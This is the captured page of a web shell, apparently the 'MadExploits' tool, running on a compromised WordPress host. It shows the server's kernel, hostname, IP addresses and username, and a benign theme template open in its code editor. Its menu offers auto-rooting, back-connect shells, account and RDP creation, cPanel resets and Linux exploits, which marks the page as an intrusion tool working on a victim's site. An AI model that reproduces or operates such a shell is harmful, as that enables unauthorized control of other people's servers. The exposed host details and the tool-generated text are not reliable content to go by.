Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 52.14.90.36
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviveplus.online /
wp-content /
themes /
twentytwentyone /
template-parts /
excerpt /
[ HOME SHELL ]
Name
Size
Permission
Action
excerpt-aside.php
284
B
-rw-r--r--
excerpt-audio.php
646
B
-rw-r--r--
excerpt-chat.php
530
B
-rw-r--r--
excerpt-gallery.php
438
B
-rw-r--r--
excerpt-image.php
520
B
-rw-r--r--
excerpt-link.php
502
B
-rw-r--r--
excerpt-quote.php
612
B
-rw-r--r--
excerpt-status.php
285
B
-rw-r--r--
excerpt-video.php
646
B
-rw-r--r--
excerpt.php
219
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : excerpt-video.php
<?php /** * Show the appropriate content for the Video post format. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package WordPress * @subpackage Twenty_Twenty_One * @since Twenty Twenty-One 1.0 */ $content = get_the_content(); if ( has_block( 'core/video', $content ) ) { twenty_twenty_one_print_first_instance_of_block( 'core/video', $content ); } elseif ( has_block( 'core/embed', $content ) ) { twenty_twenty_one_print_first_instance_of_block( 'core/embed', $content ); } else { twenty_twenty_one_print_first_instance_of_block( 'core-embed/*', $content ); } // Add the excerpt. the_excerpt();
Close